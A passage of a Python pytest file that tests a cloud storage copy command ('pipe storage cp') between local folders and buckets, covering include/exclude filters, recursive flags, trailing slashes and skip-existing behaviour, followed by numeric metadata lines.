os.path.abspath(self.test_folder) case = "EPMCMBIBPC-631-1" destination = "cp://{}/{}/".format(self.bucket_name, case) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, 
include=["*txt"], exclude=["{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info( ObjectInfo(True).build(os.path.join(source, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_does_not_exist( ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_with_other_extension)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build( self.bucket_name, os.path.join(case, self.test_file_with_other_extension)), case) @pytest.mark.run(order=2) def test_included_excluded_files_should_be_downloaded(self): case = "EPMCMBIBPC-631-2" source = "cp://{}/{}/".format(self.bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) destination = os.path.abspath(os.path.join(self.output_folder, case)) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*txt"], exclude=["{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_1), ObjectInfo(True).build(os.path.join(destination, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join( destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join( destination, self.test_file_with_other_extension)), case) @pytest.mark.run(order=3) def test_included_excluded_files_be_copied(self): case = "EPMCMBIBPC-631-3" source = "cp://{}/{}/".format(self.bucket_name, case) destination = "cp://{}/{}/".format(self.other_bucket_name, case) key_file_1 = os.path.join(case, self.test_file_1) 
key_file_2 = os.path.join(case, self.test_file_with_other_extension) key_file_folder = os.path.join(case, self.test_folder, self.test_file_1) create_test_files_on_bucket(self.test_file_1, self.bucket_name, key_file_1, key_file_2, key_file_folder) logging.info("Ready to perform operation from {} to {}".format(source, destination)) pipe_storage_cp(source, destination, recursive=True, include=["*txt"], exclude=["{}*".format(self.test_folder)], expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, key_file_1), ObjectInfo(False).build(self.other_bucket_name, key_file_1), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_folder), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.other_bucket_name, key_file_2), case) @pytest.mark.run(order=4) def test_upload_without_recursive(self): case = "EPMCMBIBPC-662" source = os.path.abspath(self.test_folder) destination = "cp://{}/".format(os.path.join(self.bucket_name, case)) error_text = pipe_storage_cp(source, destination, expected_status=1)[1] assert_error_message_is_present(error_text, "Flag --recursive (-r) is required to copy folders.") assert_copied_object_does_not_exist(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)), case) @pytest.mark.run(order=5) def test_download_without_recursive(self): case = "EPMCMBIBPC-662" source = "cp://{}/".format(os.path.join(self.bucket_name, case)) create_test_files_on_bucket(self.test_file_1, self.bucket_name, os.path.join(case, self.test_file_1), os.path.join(case, self.test_folder, self.test_file_1)) destination = os.path.abspath(self.output_folder + case) + "/" error_text = pipe_storage_cp(source, destination, expected_status=1)[1] assert_error_message_is_present(error_text, "Flag --recursive (-r) is required to copy 
folders.") assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_file_1)), case) @pytest.mark.run(order=6) def test_copy_without_recursive(self): case = "EPMCMBIBPC-662" source = "cp://{}/".format(os.path.join(self.bucket_name, case)) destination = "cp://{}/".format(os.path.join(self.other_bucket_name, case)) error_text = pipe_storage_cp(source, destination, expected_status=1)[1] assert_error_message_is_present(error_text, "Flag --recursive (-r) is required to copy folders.") assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_does_not_exist(ObjectInfo(True).build(os.path.join(destination, self.test_file_1)), case) @pytest.mark.run(order=6) def test_copy_to_bucket_root(self): case = "EPMCMBIBPC-1969" source = os.path.abspath(self.test_folder) destination = "cp://%s/" % self.bucket_name logging.info("Test case: %s. 
Ready to perform operation from %s to %s" % (case, source, destination)) pipe_storage_cp(source, destination, recursive=True, force=True) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, self.test_file_1), case) assert_copied_object_info(ObjectInfo(True).build(os.path.join(source, self.test_folder, self.test_file_1)), ObjectInfo(False).build(self.bucket_name, self.test_folder + self.test_file_1), case) @pytest.mark.run(order=6) def test_copy_file_to_bucket_with_folder_with_same_name(self): case = "EPMCMBIBPC-1970" try: pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s/%s/" % (self.bucket_name, case, self.test_file_1)) assert object_exists(self.bucket_name, "%s/%s/%s" % (case, self.test_file_1, self.test_file_1)) pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s/" % (self.bucket_name, case)) assert object_exists(self.bucket_name, "%s/%s" % (case, self.test_file_1)) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_copy_folder_structure(self): case = "EPMCMBIBPC-1971-1972" source = os.path.abspath(self.test_folder_structure) destination = "cp://%s/%s/" % (self.bucket_name, case) logging.info("Test case: %s. Ready to perform operation from %s to %s" % (case, source, destination)) try: pipe_storage_cp(source, destination, recursive=True) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder_2, self.test_file_1)) source = destination destination = os.path.abspath(self.test_folder_structure_output) + "/" logging.info("Test case: %s. 
Ready to perform operation from %s to %s" % (case, source, destination)) pipe_storage_cp(source, destination, recursive=True, expected_status=0) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)), ObjectInfo(True).build(os.path.join(destination, self.test_folder, self.test_file_1)), case) assert_copied_object_info(ObjectInfo(False).build(self.bucket_name, os.path.join(case, self.test_folder_2, self.test_file_1)), ObjectInfo(True).build(os.path.join(destination, self.test_folder_2, self.test_file_1)), case) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_upload_file_to_not_empty_folder(self): test_case = "EPMCMBIBPC-1978" try: source1 = "cp://{}/{}/{}".format(self.bucket_name, test_case, self.test_file_1) pipe_storage_cp(os.path.abspath(self.test_file_1), source1, expected_status=0) assert object_exists(self.bucket_name, "%s/%s" % (test_case, self.test_file_1)) source2 = "cp://{}/{}/".format(self.bucket_name, test_case) pipe_storage_cp(os.path.abspath(self.test_file_2), source2, expected_status=0) assert object_exists(self.bucket_name, "%s/%s" % (test_case, self.test_file_2)) except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(test_case, e.message)) @pytest.mark.run(order=6) def test_upload_folders_with_similar_keys(self): case = "EPMCMBIBPC-2007" source_folder = os.path.abspath(os.path.join(self.test_folder, case)) test_folder1 = "folder" test_folder2 = "folder2" try: create_test_folder(source_folder) create_test_folder(os.path.join(source_folder, test_folder1)) create_test_folder(os.path.join(source_folder, test_folder2)) create_test_file(os.path.join(source_folder, test_folder1, self.test_file_1), TestFiles.DEFAULT_CONTENT) create_test_file(os.path.join(source_folder, test_folder2, self.test_file_2), TestFiles.COPY_CONTENT) pipe_storage_cp(os.path.join(source_folder, test_folder1), "cp://%s/%s/" % (self.bucket_name, case), recursive=True) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_1)) assert not object_exists(self.bucket_name, os.path.join(case, self.test_file_2)) except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) @pytest.mark.run(order=6) def test_download_folders_with_similar_keys(self): case = "EPMCMBIBPC-2008" try: pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s/folder/" % (self.bucket_name, case)) assert object_exists(self.bucket_name, os.path.join(case, "folder", self.test_file_1)) pipe_storage_cp(os.path.abspath(self.test_file_2), "cp://%s/%s/folder2/" % (self.bucket_name, case)) assert object_exists(self.bucket_name, os.path.join(case, "folder2", self.test_file_2)) pipe_storage_cp("cp://%s/%s/folder" % (self.bucket_name, case), "%s/" % os.path.join(self.output_folder, case), recursive=True) assert os.path.exists(os.path.abspath(os.path.join(self.output_folder, case, self.test_file_1))) assert not os.path.exists(os.path.abspath( os.path.join(self.output_folder, case, self.test_file_2))) except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) test_case_for_upload_with_slash = [("EPMCMBIBPC-2159-1", True, True), ("EPMCMBIBPC-2159-2", True, False), ("EPMCMBIBPC-2159-3", False, False), ("EPMCMBIBPC-2159-4", False, True)] @pytest.mark.run(order=6) @pytest.mark.parametrize("case,has_destination_slash,has_source_slash", test_case_for_upload_with_slash) def test_folder_with_slash_should_upload_content_only(self, case, has_destination_slash, has_source_slash): source = os.path.abspath(self.test_folder) destination = "cp://%s/%s" % (self.bucket_name, case) source, destination = prepare_paths_with_slash(source, destination, has_source_slash, has_destination_slash) try: pipe_storage_cp(source, destination, recursive=True) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_1)) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_with_other_extension)) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) test_case_for_download_with_slash = [("EPMCMBIBPC-2200-1", True, True), ("EPMCMBIBPC-2200-2", True, False), ("EPMCMBIBPC-2200-3", False, False), ("EPMCMBIBPC-2200-4", False, True)] @pytest.mark.run(order=6) @pytest.mark.parametrize("case,has_destination_slash,has_source_slash", test_case_for_download_with_slash) def test_folder_with_slash_should_download_content_only(self, case, has_destination_slash, has_source_slash): source = "cp://%s/%s" % (self.bucket_name, case) destination = os.path.abspath(os.path.join(self.output_folder, case)) source, destination = prepare_paths_with_slash(source, destination, has_source_slash, has_destination_slash) try: self._create_folder_on_bucket(case) pipe_storage_cp(source, destination, recursive=True) assert os.path.exists(os.path.join(destination, self.test_file_1)) assert os.path.exists(os.path.join(destination, self.test_file_with_other_extension)) assert os.path.exists(os.path.join(destination, self.test_folder, self.test_file_1)) except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) test_case_for_copy_between_buckets_with_slash = [("EPMCMBIBPC-2201-1", True, True), ("EPMCMBIBPC-2201-2", True, False), ("EPMCMBIBPC-2201-3", False, False), ("EPMCMBIBPC-2201-4", False, True)] @pytest.mark.run(order=6) @pytest.mark.parametrize("case,has_destination_slash,has_source_slash", test_case_for_copy_between_buckets_with_slash) def test_folder_with_slash_should_copy_between_buckets_content_only(self, case, has_destination_slash, has_source_slash): source = "cp://%s/%s" % (self.bucket_name, case) destination = "cp://%s/%s" % (self.other_bucket_name, case) source, destination = prepare_paths_with_slash(source, destination, has_source_slash, has_destination_slash) try: self._create_folder_on_bucket(case) pipe_storage_cp(source, destination, recursive=True) assert object_exists(self.other_bucket_name, os.path.join(case, self.test_file_1)) assert object_exists(self.other_bucket_name, os.path.join(case, self.test_file_with_other_extension)) assert object_exists(self.other_bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) @pytest.mark.run(order=6) def test_upload_folder_with_skip_existing_option_should_skip(self): case = "EPMCMBIBPC-2162" key = os.path.join(case, self.test_file_1) source = os.path.abspath(self.test_folder) destination = "cp://%s/%s" % (self.bucket_name, case) try: expected = create_file_on_bucket(self.bucket_name, key, os.path.abspath(os.path.join(self.test_folder, self.test_file_1))) pipe_storage_cp(source, destination, force=True, recursive=True, skip_existing=True) assert object_exists(self.bucket_name, key) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_with_other_extension)) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) actual = ObjectInfo(False).build(self.bucket_name, key) assert expected.size == actual.size, \ "Sizes must be the same.\nExpected %s\nActual %s" % (expected.size, actual.size) assert expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be the same.\n" \ "Expected %s\nActual %s".format(expected.last_modified, actual.last_modified) except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) @pytest.mark.run(order=6) def test_upload_folder_with_skip_existing_option_should_not_skip(self): case = "EPMCMBIBPC-2163" key1 = os.path.join(case, self.test_file_1) source = os.path.abspath(self.test_folder) destination = "cp://%s/%s" % (self.bucket_name, case) try: expected = create_file_on_bucket(self.bucket_name, key1, os.path.abspath(self.test_file_2)) pipe_storage_cp(source, destination, force=True, recursive=True, skip_existing=True) assert object_exists(self.bucket_name, key1) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_with_other_extension)) assert object_exists(self.bucket_name, os.path.join(case, self.test_folder, self.test_file_1)) actual = ObjectInfo(False).build(self.bucket_name, key1) assert not expected.size == actual.size, "Sizes must be the different." assert not expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be different." except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) @pytest.mark.run(order=6) def test_download_folder_with_skip_existing_option_should_skip(self): case = "EPMCMBIBPC-2182" destination_folder = os.path.abspath(os.path.join(self.output_folder, case)) destination1 = os.path.join(destination_folder, self.test_file_1) destination2 = os.path.join(destination_folder, self.test_file_2) source_folder = "cp://%s/%s/" % (self.bucket_name, case) try: create_test_file(destination1, TestFiles.DEFAULT_CONTENT) expected = ObjectInfo(True).build(destination1) pipe_storage_cp(os.path.abspath(self.test_file_1), source_folder) pipe_storage_cp(os.path.abspath(self.test_file_2), source_folder) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_1)) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_2)) pipe_storage_cp(source_folder, destination_folder, force=True, recursive=True, skip_existing=True) assert os.path.exists(destination1) assert os.path.exists(destination2) actual = ObjectInfo(True).build(destination1) assert expected.size == actual.size, \ "Sizes must be the same.\nExpected %s\nActual %s" % (expected.size, actual.size) assert expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be the same.\n" \ "Expected %s\nActual %s".format(expected.last_modified, actual.last_modified) except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) @pytest.mark.run(order=6) def test_download_folder_with_skip_existing_option_should_not_skip(self): case = "EPMCMBIBPC-2184" destination_folder = os.path.abspath(os.path.join(self.output_folder, case)) destination1 = os.path.join(destination_folder, self.test_file_1) destination2 = os.path.join(destination_folder, self.test_file_2) source_folder = "cp://%s/%s/" % (self.bucket_name, case) try: create_test_file(destination1, TestFiles.COPY_CONTENT) expected = ObjectInfo(True).build(destination1) pipe_storage_cp(os.path.abspath(self.test_file_1), source_folder) pipe_storage_cp(os.path.abspath(self.test_file_2), source_folder) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_1)) assert object_exists(self.bucket_name, os.path.join(case, self.test_file_2)) pipe_storage_cp(source_folder, destination_folder, force=True, recursive=True, skip_existing=True) assert os.path.exists(destination1) assert os.path.exists(destination2) actual = ObjectInfo(True).build(destination1) assert not expected.size == actual.size, "Sizes must be the different." assert not expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be different." except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) @pytest.mark.run(order=6) def test_copy_folder_between_buckets_with_skip_existing_option_should_skip(self): case = "EPMCMBIBPC-2207" source_folder = "cp://%s/%s/" % (self.bucket_name, case) destination_folder = "cp://%s/%s/" % (self.other_bucket_name, case) key1 = os.path.join(case, self.test_file_1) key2 = os.path.join(case, self.test_file_2) try: expected = create_file_on_bucket(self.other_bucket_name, key1, os.path.abspath(self.test_file_1)) pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s" % (self.bucket_name, key1)) pipe_storage_cp(os.path.abspath(self.test_file_2), "cp://%s/%s" % (self.bucket_name, key2)) assert object_exists(self.bucket_name, key1) assert object_exists(self.bucket_name, key2) pipe_storage_cp(source_folder, destination_folder, force=True, recursive=True, skip_existing=True) assert object_exists(self.other_bucket_name, key1) assert object_exists(self.other_bucket_name, key2) actual = ObjectInfo(False).build(self.other_bucket_name, key1) assert expected.size == actual.size, \ "Sizes must be the same.\nExpected %s\nActual %s" % (expected.size, actual.size) assert expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be the same.\n" \ "Expected %s\nActual %s".format(expected.last_modified, actual.last_modified) except BaseException as e: pytest.fail("Test case {} failed. 
{}".format(case, e.message)) @pytest.mark.run(order=6) def test_copy_folder_between_buckets_with_skip_existing_option_should_not_skip(self): case = "EPMCMBIBPC-2208" key1 = os.path.join(case, self.test_file_1) key2 = os.path.join(case, self.test_file_2) source_folder = "cp://%s/%s/" % (self.bucket_name, case) destination_folder = "cp://%s/%s/" % (self.other_bucket_name, case) try: expected = create_file_on_bucket(self.other_bucket_name, key1, os.path.abspath(self.test_file_2)) pipe_storage_cp(os.path.abspath(self.test_file_1), "cp://%s/%s" % (self.bucket_name, key1)) pipe_storage_cp(os.path.abspath(self.test_file_2), "cp://%s/%s" % (self.bucket_name, key2)) assert object_exists(self.bucket_name, key1) assert object_exists(self.bucket_name, key2) pipe_storage_cp(source_folder, destination_folder, force=True, recursive=True, skip_existing=True) assert object_exists(self.other_bucket_name, key1) assert object_exists(self.other_bucket_name, key2) actual = ObjectInfo(False).build(self.other_bucket_name, key1) assert not expected.size == actual.size, "Sizes must be the different." assert not expected.last_modified == actual.last_modified, \ "Last modified time of destination and source file must be different." except BaseException as e: pytest.fail("Test case {} failed. {}".format(case, e.message)) def _create_folder_on_bucket(self, case): source_files = os.path.abspath(self.test_folder) source1 = os.path.join(source_files, self.test_file_1) source2 = os.path.join(source_files, self.test_file_with_other_extension) source3 = os.path.join(source_files, self.test_folder, self.test_file_1) pipe_storage_cp(source1, "cp://%s/%s/%s" % (self.bucket_name, case, self.test_file_1)) pipe_storage_cp(source2, "cp://%s/%s/%s" % (self.bucket_name, case, self.test_file_with_other_extension)) pipe_storage_cp(source3, "cp://%s/%s/%s/%s" % (self.bucket_name, case, self.test_folder, self.test_file_1))
63.027548
120
0.648062
5,944
45,758
4.697005
0.042732
0.047065
0.067051
0.053082
0.908378
0.884702
0.855475
0.826892
0.797808
0.775852
0
0.015309
0.234866
45,758
725
121
63.114483
0.782126
0.022663
0
0.571659
0
0
0.086513
0.006502
0
0
0
0
0.167472
1
0.05314
false
0
0.004831
0
0.090177
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6